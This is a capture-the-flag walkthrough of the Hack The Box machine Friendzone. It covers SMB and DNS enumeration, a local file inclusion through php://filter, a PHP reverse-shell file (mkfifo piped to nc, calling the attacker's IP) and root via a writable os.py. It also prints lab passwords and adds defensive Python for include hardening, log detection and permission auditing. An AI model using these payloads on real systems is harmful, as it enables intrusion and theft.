This post is a walkthrough of the hackthebox machine Friendzone.
Hackthebox Friendzone Walkthrough
Initial Enumeration
Nmap Scan
nmap -sT -p- -min-rate 10000 -Pn -oN alltcp.txt 10.10.10.123
sudo nmap -sU -p- -min-rate 10000 -Pn -oN alludp.txt 10.10.10.123
sudo nmap -p 21,22,53,80,139,443,445 -Pn -sC -sV -oN detailed.txt 10.10.10.123
sudo nmap -p 21,22,53,80,139,443,445 -script VULN 10.10.10.123
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-02-14 19:43 EST
Nmap scan report for 10.10.10.123
Host is up (0.059s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 a9:68:24:bc:97:1f:1e:54:a5:80:45:e7:4c:d9:aa:a0 (RSA)
| 256 e5:44:01:46:ee:7a:bb:7c:e9:1a:cb:14:99:9e:2b:8e (ECDSA)
|_ 256 00:4e:1a:4f:33:e8:a0:de:86:a6:e4:2a:5f:84:61:2b (ED25519)
53/tcp open domain ISC BIND 9.11.3-1ubuntu1.2 (Ubuntu Linux)
| dns-nsid:
|_ bind.version: 9.11.3-1ubuntu1.2-Ubuntu
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Friend Zone Escape software
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
443/tcp open ssl/http Apache httpd 2.4.29
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: 404 Not Found
| ssl-cert: Subject: commonName=friendzone.red/organizationName=CODERED/stateOrProvinceName=CODERED/countryName=JO
| Not valid before: 2018-10-05T21:02:30
|_Not valid after: 2018-11-04T21:02:30
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
445/tcp open netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
Service Info: Hosts: FRIENDZONE, 127.0.0.1; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: -39m58s, deviation: 1h09m16s, median: 0s
|_nbstat: NetBIOS name: FRIENDZONE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
| Computer name: friendzone
| NetBIOS computer name: FRIENDZONE\x00
| Domain name: \x00
| FQDN: friendzone
|_ System time: 2022-02-15T02:43:23+02:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2022-02-15T00:43:23
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.38 seconds
└─$ nmap -sT -p- -min-rate 10000 -Pn -oN alltcp.txt 10.10.10.123
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-02-14 19:28 EST
Nmap scan report for 10.10.10.123
Host is up (0.054s latency).
Not shown: 65528 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
53/tcp open domain
80/tcp open http
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
Nmap done: 1 IP address (1 host up) scanned in 6.77 seconds
┌──(rocky㉿kali)-[~/hckbox/Friendzone]
└─$ sudo nmap -sU -p- -min-rate 10000 -Pn -oN alludp.txt 10.10.10.123
[sudo] password for rocky:
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-02-14 19:30 EST
Warning: 10.10.10.123 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.10.123
Host is up (0.054s latency).
Not shown: 65456 open|filtered ports, 78 closed ports
PORT STATE SERVICE
53/udp open domain
└─$ sudo nmap -p 21,22,53,80,139,443,445 -script VULN 10.10.10.123
Starting Nmap 7.91 ( https://nmap.org ) at 2022-02-14 19:55 EST
Nmap scan report for 10.10.10.123
Host is up (0.052s latency).
PORT STATE SERVICE
21/tcp open ftp
|_sslv2-drown:
22/tcp open ssh
53/tcp open domain
80/tcp open http
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
| /wordpress/: Blog
|_ /robots.txt: Robots file
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
139/tcp open netbios-ssn
443/tcp open https
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_sslv2-drown:
445/tcp open microsoft-ds
Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: false
| smb-vuln-regsvc-dos:
| VULNERABLE:
| Service regsvc in Microsoft Windows systems vulnerable to denial of service
| State: VULNERABLE
| The service regsvc in Microsoft Windows 2000 systems is vulnerable to denial of service caused by a null deference
| pointer. This script will crash the service if it is vulnerable. This vulnerability was discovered by Ron Bowes
| while working on smb-enum-sessions.
|_
Nmap done: 1 IP address (1 host up) scanned in 65.09 seconds
enum4linux 10.10.10.123
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Mon Feb 14 19:57:09 2022
=========================================
| Share Enumeration on 10.10.10.123 |
=========================================
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
Files Disk FriendZone Samba Server Files /etc/Files
general Disk FriendZone Samba Server Files
Development Disk FriendZone Samba Server Files
IPC$ IPC IPC Service (FriendZone server (Samba, Ubuntu))
SMB1 disabled -- no workgroup available
[+] Attempting to map shares on 10.10.10.123
//10.10.10.123/print$ Mapping: DENIED, Listing: N/A
//10.10.10.123/Files Mapping: DENIED, Listing: N/A
//10.10.10.123/general Mapping: OK, Listing: OK
//10.10.10.123/Development Mapping: OK, Listing: OK
//10.10.10.123/IPC$ [E] Can't understand response:
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*
S-1-5-32-543 *unknown*\*unknown* (8)
S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)
S-1-5-32-1000 *unknown*\*unknown* (8)
S-1-5-32-1001 *unknown*\*unknown* (8)
The initial enumeration has given a lot of clues. I will explore SMB first, as several shares and users were found, and then check whether the web services (ports 80 and 443) can be used to get a foothold.
$ sudo nmap -p 139,445 -script smb-enum-shares.nse 10.10.10.123
[sudo] password for rocky:
Starting Nmap 7.91 ( https://nmap.org ) at 2022-02-14 20:16 EST
Nmap scan report for 10.10.10.123
Host is up (0.052s latency).
PORT STATE SERVICE
139/tcp open netbios-ssn
445/tcp open microsoft-ds
Host script results:
| smb-enum-shares:
| account_used: guest
| \\10.10.10.123\Development:
| Type: STYPE_DISKTREE
| Comment: FriendZone Samba Server Files
| Users: 0
| Max Users: <unlimited>
| Path: C:\etc\Development
| Anonymous access: READ/WRITE
| Current user access: READ/WRITE
| \\10.10.10.123\Files:
| Type: STYPE_DISKTREE
| Comment: FriendZone Samba Server Files /etc/Files
| Users: 0
| Max Users: <unlimited>
| Path: C:\etc\hole
| Anonymous access: <none>
|  Current user access: <none>
| \\10.10.10.123\IPC$:
| Type: STYPE_IPC_HIDDEN
| Comment: IPC Service (FriendZone server (Samba, Ubuntu))
| Users: 1
| Max Users: <unlimited>
| Path: C:\tmp
| Anonymous access: READ/WRITE
| Current user access: READ/WRITE
| \\10.10.10.123\general:
| Type: STYPE_DISKTREE
| Comment: FriendZone Samba Server Files
| Users: 0
| Max Users: <unlimited>
| Path: C:\etc\general
| Anonymous access: READ/WRITE
| Current user access: READ/WRITE
| \\10.10.10.123\print$:
| Type: STYPE_DISKTREE
| Comment: Printer Drivers
| Users: 0
| Max Users: <unlimited>
| Path: C:\var\lib\samba\printers
| Anonymous access: <none>
|_ Current user access: <none>
Nmap done: 1 IP address (1 host up) scanned in 13.89 seconds
smbmap -H 10.10.10.123 -R
[+] Guest session IP: 10.10.10.123:445 Name: 10.10.10.123
Disk Permissions Comment
---- ----------- -------
print$ NO ACCESS Printer Drivers
Files NO ACCESS FriendZone Samba Server Files /etc/Files
general READ ONLY FriendZone Samba Server Files
.\general\*
dr--r--r-- 0 Wed Jan 16 15:10:51 2019 .
dr--r--r-- 0 Wed Jan 23 16:51:02 2019 ..
fr--r--r-- 57 Tue Oct 9 19:52:42 2018 creds.txt
Development READ, WRITE FriendZone Samba Server Files
.\Development\*
dr--r--r-- 0 Mon Feb 14 20:23:07 2022 .
dr--r--r-- 0 Wed Jan 23 16:51:02 2019 ..
fr--r--r-- 5493 Mon Feb 14 08:02:37 2022 a.php
IPC$ NO ACCESS IPC Service (FriendZone server (Samba, Ubuntu))
smbclient \\\\10.10.10.123\\general
Enter WORKGROUP\rocky's password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Wed Jan 16 15:10:51 2019
.. D 0 Wed Jan 23 16:51:02 2019
creds.txt N 57 Tue Oct 9 19:52:42 2018
9221460 blocks of size 1024. 6455140 blocks available
smb: \> get creds.txt
getting file \creds.txt of size 57 as creds.txt (0.3 KiloBytes/sec) (average 0.3 KiloBytes/sec)
smb: \> exit
┌──(rocky㉿kali)-[~/hckbox/Friendzone]
└─$ cat creds.txt
creds for the admin THING:
admin:WORKW******
We have got some credentials with the username admin. I am not sure these are the administrator credentials. I am trying to see if there is a web login page where I can apply them.

gobuster dir -u http://10.10.10.123 -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.123
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2022/02/14 20:40:12 Starting gobuster in directory enumeration mode
===============================================================
/.hta (Status: 403) [Size: 291]
/.htaccess (Status: 403) [Size: 296]
/.htpasswd (Status: 403) [Size: 296]
/index.html (Status: 200) [Size: 324]
/robots.txt (Status: 200) [Size: 13]
/server-status (Status: 403) [Size: 300]
/wordpress (Status: 301) [Size: 316] [--> http://10.10.10.123/wordpress/]
===============================================================
2022/02/14 20:40:37 Finished


dig axfr @10.10.10.123
; <<>> DiG 9.16.15-Debian <<>> axfr @10.10.10.123
; (1 server found)
;; global options: +cmd
;; Query time: 51 msec
;; SERVER: 10.10.10.123#53(10.10.10.123)
;; WHEN: Mon Feb 14 23:53:16 EST 2022
;; MSG SIZE rcvd: 56
┌──(rocky㉿kali)-[~/hckbox/Friendzone]
└─$ dig axfr @10.10.10.123 friendzoneportal.red
; <<>> DiG 9.16.15-Debian <<>> axfr @10.10.10.123 friendzoneportal.red
; (1 server found)
;; global options: +cmd
friendzoneportal.red. 604800 IN SOA localhost. root.localhost. 2 604800 86400 2419200 604800
friendzoneportal.red. 604800 IN AAAA ::1
friendzoneportal.red. 604800 IN NS localhost.
friendzoneportal.red. 604800 IN A 127.0.0.1
admin.friendzoneportal.red. 604800 IN A 127.0.0.1
files.friendzoneportal.red. 604800 IN A 127.0.0.1
imports.friendzoneportal.red. 604800 IN A 127.0.0.1
vpn.friendzoneportal.red. 604800 IN A 127.0.0.1
friendzoneportal.red. 604800 IN SOA localhost. root.localhost. 2 604800 86400 2419200 604800
;; Query time: 51 msec
;; SERVER: 10.10.10.123#53(10.10.10.123)
;; WHEN: Mon Feb 14 23:53:40 EST 2022
;; XFR size: 9 records (messages 1, bytes 309)
$ dig axfr @10.10.10.123 friendzone.red
; <<>> DiG 9.16.15-Debian <<>> axfr @10.10.10.123 friendzone.red
; (1 server found)
;; global options: +cmd
friendzone.red. 604800 IN SOA localhost. root.localhost. 2 604800 86400 2419200 604800
friendzone.red. 604800 IN AAAA ::1
friendzone.red. 604800 IN NS localhost.
friendzone.red. 604800 IN A 127.0.0.1
administrator1.friendzone.red. 604800 IN A 127.0.0.1
hr.friendzone.red. 604800 IN A 127.0.0.1
uploads.friendzone.red. 604800 IN A 127.0.0.1
friendzone.red. 604800 IN SOA localhost. root.localhost. 2 604800 86400 2419200 604800
;; Query time: 55 msec
;; SERVER: 10.10.10.123#53(10.10.10.123)
;; WHEN: Tue Feb 15 00:23:59 EST 2022
;; XFR size: 8 records (messages 1, bytes 289)

Let's try accessing https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=timestamp

At this stage we have the following hints:
- Authenticated Administrator Dashboard
- Image upload URL
- Image access format once uploaded
gobuster dir -u https://administrator1.friendzone.red -w /usr/share/wordlists/dirb/common.txt -x php -k
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: https://administrator1.friendzone.red
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: php
[+] Timeout: 10s
===============================================================
2022/02/15 19:16:22 Starting gobuster in directory enumeration mode
===============================================================
/.hta (Status: 403) [Size: 309]
/.hta.php (Status: 403) [Size: 313]
/.htaccess (Status: 403) [Size: 314]
/.htpasswd.php (Status: 403) [Size: 318]
/.htaccess.php (Status: 403) [Size: 318]
/.htpasswd (Status: 403) [Size: 314]
/dashboard.php (Status: 200) [Size: 101]
/images (Status: 301) [Size: 349] [--> https://administrator1.friendzone.red/images/]
/index.html (Status: 200) [Size: 2873]
/login.php (Status: 200) [Size: 7]
/server-status (Status: 403) [Size: 318]
===============================================================
2022/02/15 19:17:13 Finished
I also remember there was a Development folder which we found during the smbclient enumeration. Let's try to log in anonymously to the Development folder via smbclient and upload a PHP reverse shell script.

How do I access the PHP file I uploaded? I remember the Development folder was under /etc. This information was captured during the SMB enumeration:

I tried calling it with different combinations to access the rev.php file, e.g. https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=../../../etc/development/rev. It did not give me a reverse shell.
I decided to explore dashboard.php, login.php and upload.php to understand the setup of the website:
https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=php://filter/convert.base64-encode/resource=dashboard
https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=php://filter/convert.base64-encode/resource=login
https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=php://filter/convert.base64-encode/resource=upload
Except for upload, both dashboard and login returned base64-encoded source, which I decoded with Burp.

dashboard
--
<?php
//echo "<center><h2>Smart photo script for friendzone corp !</h2></center>";
//echo "<center><h3>* Note : we are dealing with a beginner php developer and the application is not tested yet !</h3></center>";
echo "<title>FriendZone Admin !</title>";
$auth = $_COOKIE["FriendZoneAuth"];
if ($auth === "e7749d0f4b4da5d03e6e9196fd1d18f1"){
    echo "<br><br><br>";
    echo "<center><h2>Smart photo script for friendzone corp !</h2></center>";
    echo "<center><h3>* Note : we are dealing with a beginner php developer and the application is not tested yet !</h3></center>";
    if(!isset($_GET["image_id"])){
        echo "<br><br>";
        echo "<center><p>image_name param is missed !</p></center>";
        echo "<center><p>please enter it to show the image</p></center>";
        echo "<center><p>default is image_id=a.jpg&pagename=timestamp</p></center>";
    }else{
        $image = $_GET["image_id"];
        echo "<center><img src='images/$image'></center>";
        echo "<center><h1>Something went worng ! , the script include wrong param !</h1></center>";
        include($_GET["pagename"].".php");
        //echo $_GET["pagename"];
    }
}else{
    echo "<center><p>You can't see the content ! , please login !</center></p>";
}
?>
--
Login
--
<?php
$username = $_POST["username"];
$password = $_POST["password"];
//echo $username === "admin";
//echo strcmp($username,"admin");
if ($username==="admin" and $password==="WORKWORKHhallelujah@#"){
    setcookie("FriendZoneAuth", "e7749d0f4b4da5d03e6e9196fd1d18f1", time() + (86400 * 30)); // 86400 = 1 day
    echo "Login Done ! visit /dashboard.php";
}else{
    echo "Wrong !";
}
?>
However, for upload.php it did not work. Remember the URL that was used for upload.

Now it seems upload.php is under the upload folder (/upload/upload.php).
Let's see the source code for upload.php using https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=php://filter/convert.base64-encode/resource=../uploads/upload
<?php
// not finished yet -- friendzone admin !
if(isset($_POST["image"])){
    echo "Uploaded successfully !<br>";
    echo time()+3600;
}else{
    echo "WHAT ARE YOU TRYING TO DO HOOOOOOMAN !";
}
?>
It's a fake upload page.
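The recovered source shows two weaknesses worth pinning down: dashboard.php hands the client-controlled pagename parameter straight to include(), and login.php authenticates with a fixed cookie value. The example below is added here (my own code, not from the box or the original post) and models the include sink in Python next to a hardened resolver: an allowlist of page names, rejection of stream wrappers, and a realpath containment check against the web root. The web root /srv/friendzone/administrator1 and the page list are assumptions; the payloads are the ones used on this page.

```python
import os
from typing import Dict, Optional

# Assumed web root of the administrator1 vhost (placeholder, not from the box).
WEBROOT = "/srv/friendzone/administrator1"

# Pages dashboard.php should be allowed to pull in (assumption: only these).
ALLOWED_PAGES = {"timestamp", "login", "upload"}


def vulnerable_resolve(pagename: str) -> str:
    """Models include($_GET["pagename"].".php"): the client-controlled value
    is concatenated with '.php' and handed to the include unchanged, so
    '../' sequences and php:// wrappers reach the file/stream layer."""
    return pagename + ".php"


def hardened_resolve(pagename: str, webroot: str = WEBROOT) -> Optional[str]:
    """Returns the file to include, or None if the request must be refused."""
    # 1. Empty values and stream wrappers (php://, data://, expect://) never
    #    name a legitimate page.
    if not pagename or "://" in pagename:
        return None
    # 2. Allowlist: a fixed set of page names, compared exactly.
    if pagename not in ALLOWED_PAGES:
        return None
    # 3. Defence in depth: resolve the path and prove it is still under the
    #    web root, so a later loosening of the allowlist cannot reintroduce
    #    traversal.
    root = os.path.realpath(webroot)
    candidate = os.path.realpath(os.path.join(root, pagename + ".php"))
    if os.path.commonpath([root, candidate]) != root:
        return None
    return candidate


# Payloads seen on this page, plus the benign default.
PAYLOADS = [
    "timestamp",
    "../../../etc/Development/rev1",
    "php://filter/convert.base64-encode/resource=login",
    "../uploads/upload",
]


def check_payloads() -> Dict[str, bool]:
    """Maps each payload to whether the hardened resolver would serve it."""
    return {p: hardened_resolve(p) is not None for p in PAYLOADS}


if __name__ == "__main__":
    for payload, allowed in check_payloads().items():
        verdict = "ALLOW " if allowed else "REFUSE"
        print(f"{verdict} {payload!r}  (vulnerable code would include "
              f"{vulnerable_resolve(payload)!r})")
```

The cookie check is the second lesson: login.php sets a constant value and dashboard.php compares against that same constant, so anyone who reads login.php's source (as done above through php://filter) can set the cookie without ever knowing the password. A server-side session started after a successful password check, rather than a static token, removes that shortcut.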
Let's use the same smbclient to upload to the Development folder. The PHP reverse shell did not work last time, so let's upload a simple cmd.php file.
smbclient //10.10.10.123/Development
Enter WORKGROUP\rocky's password:
Try "help" to get a list of possible commands.
smb: \> put cmd.php rchitect.php
putting file cmd.php as \rchitect.php (0.7 kb/s) (average 0.7 kb/s)
smb: \> ls
. D 0 Wed Feb 16 04:00:14 2022
.. D 0 Wed Jan 23 16:51:02 2019
rchitect.php A 118 Wed Feb 16 04:00:14 2022
rev.php A 5493 Tue Feb 15 19:40:45 2022
9221460 blocks of size 1024. 6446420 blocks available

Used this code:
└─$ smbclient //10.10.10.123/Development
Enter WORKGROUP\rocky's password:
Try "help" to get a list of possible commands.
smb: \> put rev1.php
putting file rev1.php as \rev1.php (0.6 kb/s) (average 0.6 kb/s)
smb: \> exit
┌──(rocky㉿kali)-[~/hckbox/Friendzone]
└─$ cat rev1.php
<?php
system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.12 1337 >/tmp/f');
?>
Called the php file like this:
https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=../../../etc/Development/rev1
I got the reverse shell now.
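From the defender's side, the chain above leaves a clear trace in the web server's access log: the pagename parameter of dashboard.php carrying a stream wrapper or directory traversal. The following example is added here (my code, not from the box or the post) and scans Apache combined-format log lines for such values. The five log lines are constructed to mirror the requests made on this page; the list of include parameters and the reason labels are assumptions.

```python
import re
from typing import Dict, List
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample lines (Apache combined format) mirroring this page's
# requests; they are not taken from the box. The fourth line is the same
# traversal, double URL-encoded.
SAMPLE_LOG = """\
10.10.14.12 - - [15/Feb/2022:19:40:45 +0200] "GET /dashboard.php?image_id=a.jpg&pagename=timestamp HTTP/1.1" 200 101 "-" "Mozilla/5.0"
10.10.14.12 - - [15/Feb/2022:19:41:02 +0200] "GET /dashboard.php?image_id=a.jpg&pagename=php://filter/convert.base64-encode/resource=login HTTP/1.1" 200 1342 "-" "Mozilla/5.0"
10.10.14.12 - - [15/Feb/2022:19:45:10 +0200] "GET /dashboard.php?image_id=a.jpg&pagename=../../../etc/Development/rev1 HTTP/1.1" 200 350 "-" "Mozilla/5.0"
10.10.14.12 - - [15/Feb/2022:19:46:00 +0200] "GET /dashboard.php?image_id=a.jpg&pagename=..%252F..%252F..%252Fetc%252FDevelopment%252Frev1 HTTP/1.1" 200 350 "-" "Mozilla/5.0"
10.10.14.12 - - [15/Feb/2022:19:47:00 +0200] "GET /images/a.jpg HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

# Fields we need from a combined-format entry: client, timestamp, request
# target and status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Query parameters that end up in include() on this application
# (assumption, based on the recovered dashboard.php source).
INCLUDE_PARAMS = {"pagename"}


def suspicious_reasons(value: str) -> List[str]:
    """Reasons a value handed to include() looks hostile. parse_qs already
    removed one layer of URL encoding; decode once more so a double-encoded
    '/' (%252F) is not missed."""
    v = unquote(value)
    reasons = []
    if "://" in v:
        reasons.append("stream-wrapper")
    if "../" in v or "..\\" in v:
        reasons.append("traversal")
    if "\x00" in v:
        reasons.append("null-byte")
    return reasons


def scan_log(text: str) -> List[Dict[str, str]]:
    """One finding per log line whose include parameter is suspicious."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        query = parse_qs(urlsplit(m["target"]).query, keep_blank_values=True)
        for param in sorted(INCLUDE_PARAMS):
            for value in query.get(param, []):
                reasons = suspicious_reasons(value)
                if reasons:
                    findings.append({
                        "ip": m["ip"], "time": m["ts"], "status": m["status"],
                        "param": param, "value": value,
                        "reasons": ",".join(reasons),
                    })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['time']} {f['ip']} {f['param']}={f['value']!r} "
              f"-> {f['reasons']} (HTTP {f['status']})")
```

Run on the sample, the benign default and the image request produce nothing, while the php://filter read and both forms of the traversal are reported. In a real deployment the web finding would be correlated with the Samba audit trail, since the file being included was written to the Development share minutes earlier.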


Found the username here:
www-data@FriendZone:/var/www$ ls
ls
admin friendzoneportal html uploads
friendzone friendzoneportaladmin mysql_data.conf
www-data@FriendZone:/var/www$ cat mysql_data.conf
cat mysql_data.conf
for development process this is the mysql creds for user friend
db_user=friend
db_pass=Agpyu12!0.213$
db_name=FZ


I ran pspy to find running cron jobs and found something interesting.

We don't have permission to edit the script.

Let's try to edit the Python os module mentioned in the script.

We have permission to edit os.py.

Added this reverse shell script to the end of the os.py file.

We are root now.
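The escalation works because a root cron job runs a Python script that imports os, and os.py on that interpreter's import path is writable by a low-privilege user. The example below is added here (my code, not from the box) and audits a Python import path for exactly that condition: world-writable .py files, which let an existing module such as os.py be replaced, and world-writable directories without the sticky bit, where a module could be added or renamed. The constructed temporary directory in demo_in_tempdir exists only so the check can be exercised offline; on a real host you would pass the target interpreter's sys.path.

```python
import os
import shutil
import stat
import sys
import tempfile
from typing import Dict, List, Tuple


def writable_by_others(path: str) -> bool:
    """True if the mode bits grant write access to 'other'."""
    try:
        st = os.stat(path)
    except OSError:
        return False
    return bool(st.st_mode & stat.S_IWOTH)


def audit_import_path(search_path: List[str]) -> List[Tuple[str, str]]:
    """Checks each directory on a Python import path (non-recursively) and
    reports what a low-privilege user could tamper with."""
    findings = []
    for directory in search_path:
        if not directory or not os.path.isdir(directory):
            continue
        st = os.stat(directory)
        # A world-writable directory without the sticky bit lets anyone add a
        # module that shadows a later entry on sys.path, or rename one away.
        if st.st_mode & stat.S_IWOTH and not st.st_mode & stat.S_ISVTX:
            findings.append((directory, "world-writable directory"))
        for name in sorted(os.listdir(directory)):
            full = os.path.join(directory, name)
            if name.endswith(".py") and os.path.isfile(full) and writable_by_others(full):
                findings.append((full, "world-writable module"))
    return findings


def demo_in_tempdir() -> Dict[str, object]:
    """Builds a constructed import directory with one sane module and one
    world-writable os.py, and returns what the audit reports before and
    after the directory itself is opened up."""
    d = tempfile.mkdtemp(prefix="pyaudit_")
    try:
        safe = os.path.join(d, "helper.py")
        loose = os.path.join(d, "os.py")
        for path, mode in ((safe, 0o644), (loose, 0o666)):
            with open(path, "w") as fh:
                fh.write("# constructed module for the audit demo\n")
            os.chmod(path, mode)
        os.chmod(d, 0o755)
        before = audit_import_path([d])
        os.chmod(d, 0o777)  # now anyone could drop a new module here
        after = audit_import_path([d])
        return {
            "module_hits": [p for p, why in before if why == "world-writable module"],
            "dir_flagged_before": any(p == d for p, _ in before),
            "dir_flagged_after": any(p == d and why == "world-writable directory"
                                     for p, why in after),
            "loose": loose,
            "safe": safe,
        }
    finally:
        shutil.rmtree(d, ignore_errors=True)


if __name__ == "__main__":
    # Audit the interpreter running this script; swap in the cron job's
    # interpreter path list when checking a real host.
    for path, why in audit_import_path(sys.path):
        print(f"{why}: {path}")
```

The fix on the box side is the usual one: standard-library directories and files owned by root with mode 755/644, and cron jobs that run with an interpreter whose import path contains no user-writable locations.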
